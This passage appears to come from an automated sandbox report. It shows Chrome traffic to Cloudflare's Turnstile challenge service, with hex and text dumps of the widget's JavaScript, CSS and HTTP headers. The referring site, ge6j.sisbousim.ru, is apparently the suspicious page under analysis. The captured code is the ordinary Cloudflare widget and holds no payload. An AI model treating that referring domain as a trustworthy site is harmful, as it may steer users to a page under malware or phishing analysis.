                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                              Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                              Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                              Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                              Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                              Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                              Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                              Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                              Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.449772104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:57 UTC800OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: iframe
                                                                              Referer: https://ge6j.sisbousim.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:57 UTC1369INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 164872
                                                                              Connection: close
                                                                              cross-origin-embedder-policy: require-corp
                                                                              cross-origin-opener-policy: same-origin
                                                                              cross-origin-resource-policy: cross-origin
                                                                              referrer-policy: same-origin
                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              origin-agent-cluster: ?1
                                                                              document-policy: js-profiling
                                                                              2024-10-03 01:13:57 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 39 31 32 39 35 39 38 34 61 34 31 66 33 2d 45 57 52 0d 0a 0d 0a
                                                                              Data Ascii: Server: cloudflareCF-RAY: 8cc91295984a41f3-EWR
                                                                              2024-10-03 01:13:57 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                              Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                              Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                              Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                              Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                              Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                              Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                              Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                              Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.449773104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:57 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc91295984a41f3&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
